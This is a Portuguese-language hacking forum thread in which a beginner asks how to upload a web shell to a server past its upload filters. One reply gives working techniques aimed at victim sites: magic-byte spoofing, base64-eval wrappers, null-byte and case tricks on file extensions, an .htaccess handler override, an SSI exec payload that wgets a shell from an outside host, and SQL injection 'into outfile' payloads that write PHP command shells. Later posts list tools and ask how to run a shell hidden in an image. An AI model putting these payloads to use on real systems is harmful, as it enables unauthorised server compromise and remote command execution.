Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Upar Shell em servidor

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Upar Shell em servidor

    Olaá pessoal , gostaria de saber como eu posso está upando uma shell para um servidor sem usar linux , já tentei o método do http headers com tutorial do 5UBZER0 mas sem sucesso , alguém mais alguns métodos que venham a funcionar ?

    Sou iniciante haha e não consigo bular o filtro.

    -Obrigado.

  • Font Size
    #2
    tmb gostava saber

    Comment


    • Font Size
      #3
      Postado Originalmente por Neeh Ver Post
      Olaá pessoal , gostaria de saber como eu posso está upando uma shell para um servidor sem usar linux , já tentei o método do http headers com tutorial do 5UBZER0 mas sem sucesso , alguém mais alguns métodos que venham a funcionar ?

      Sou iniciante haha e não consigo bular o filtro.

      -Obrigado.
      Qual tipo de filtro?

      Comment


      • Font Size
        #4
        .

        Postado Originalmente por Alexp_2 Ver Post
        tmb gostava saber
        Se for um filtro que lê apenas o conteúdo e ignora a extensão, se vc tenta upa uma shell em php ele irá ler as primeiras linhas do código e vc não tera sucesso por exemplo:

        <?php

        código da shell aqui

        ?>

        Agora se vc fizer isso:

        GIF89;a
        GIF89;a
        GIF89;a

        <php

        código da shell aqui

        ?>
        Vc irá burlar o filtro porque ele só lê o conteúdo, quando ver GIF89;a no começo do código irá interpretar como se fosse uma imagem e vc irá conseguir upar sua shell sem problemas.

        Outra alternativa, encriptar com base64 para evitar aquela mensagem de "Internal Server Error" pode se encodar o código aqui: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        <?
        eval(base64_decode('código da shell encriptado'));
        ?>
        Tamper Data é uma alternativa (procura no Youtube tem mil videos), outra alternativa é acessar o diretório que a shell estaria mesmo se aparecer erro na tela (as vezes o erro aparece mas a shell é upada mesmo assim).

        Se for um filtro que pega a extensão do nome do arquivo pode se tentar assim:

        nome_do_arquivo.jpg.php
        nome_do_arquivo.jpg%00.php
        nome_do_arquivo.php%00.jpg
        nome_do_arquivo.php ......
        nome_do_arquivo.php;
        nome_do_arquivo.php5
        nome_do_arquivo.PHP
        nome_do_arquivo.PhP
        nome_do_arquivo.pHp
        nome_do_arquivo.pHP

        Se conseguir subir um .htaccess pode adicionar o código:
        <FilesMatch "_php.gif">
        SetHandler application/x-httpd-php
        </FilesMatch>
        Após isso upar uma shell no formato .gif que ele irá interpreta-la como php.

        Se conseguir upar uma shell no formato de texto .txt pode se tentar:
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        Se for vulneravel a RFI pode tentar incluir apartir de outro site, por exemplo:

        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        Se o site for vulnerável a SSI (Server Side Includes) pode se upar diretamente de um campo de pesquisa:

        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

        No campo de busca coloque:
        <pre><!--#exec cmd="wget http://www.linkdashell.com.br/shell.php" --></pre>
        Outra maneira, se pegar uma vulnerabilidade que lhe de acesso ao terminal mas não tenha wget,

        echo "<? eval(base64_decode('código da shell aqui encriptado base64'));" > shell.txt
        Irá criar o arquivo de texto shell.txt após isso é só move-lo para .php mv shell.txt nome_da_shell.php

        Pode tentar upar um php.ini modificado para tentar ativar / desativar funções que o servidor estiver rodando para facilitar também.

        Pode tentar também juntar a shell em uma imagem com Edjpgcom (procure Youtube).

        Se o site for vulneravel a SQL Injection e de alguma forma vc conseguir visualizar o diretório raiz, vc pode criar um arquivo apartir da url o membro 0Kal já criou um tutorial explicando a algum tempo, dois exemplos:

        Se não conseguir é necessário encodar em HEX o método abaixo.

        POST:

        http://www.sitevul.com.br/site/index.php?id=-1+union+select+all+1,2,3,"<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>cmd.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>" into outfile "/home/nome_do_site/public_html/nome_do_arquivo.php"

        Após isso acessa nome_do_arquivo.php e terá acesso ao terminal via URL.

        GET:

        http://www.sitevul.com.br/site/index.php?id=-1+union+select+all+1,2,3,'<pre<?php system($_GET[\'cmd\']);?></pre>' into outfile '/home/nome_do_site/public_html/nome_do_arquivo.php'

        Após isso:

        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...comando_aqui
        Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...[b]ls[b]

        Tem mais centenas de formas, coloquei alguns.. o pessoal do fórum deve conhecer mais vários, basta procurar.

        Espero ter ajudado.

        Comment


        • Font Size
          #5
          Postado Originalmente por Neeh Ver Post
          Olaá pessoal , gostaria de saber como eu posso está upando uma shell para um servidor sem usar linux , já tentei o método do http headers com tutorial do 5UBZER0 mas sem sucesso , alguém mais alguns métodos que venham a funcionar ?

          Sou iniciante haha e não consigo bular o filtro.

          -Obrigado.
          Existem varias formas de burlar filtros, primeiro é necessário conhecer o filtro.

          - Tamper Data
          - BurpSuite
          - Post Data
          - Esteganografia

          Pesquisando um pouco aqui no forum ou no google sobre esses assuntos, pode encontrar
          algumas coisas relacionadas.

          Boa sorte ae.


          *******************************************
          #! Perl - PHP - Python !#
          *******************************************
          r00t@ʤῲʪƷ#~> Zone-H

          Comment


          • Font Size
            #6
            Uia

            Não fui eu que pediu a ajuda, mas galera... fodásticas as respostas, valeu 1000000 de vezes... ^^

            Comment


            • Font Size
              #7
              upei sheel fundida em imagem... e agora????

              Então galera, eu fundí uma shell a uma imagem e dessa forma conseguí upa-la.... tem milhares de vídeos que explicam como fazer isso, mas tipo assim.... e depois?

              Como eu mudo a extenção ou faço pra rodar o script que tá no codigo da imagem? Isso não achei em lugar algum... um help please????

              Comment

              X
              Working...
              X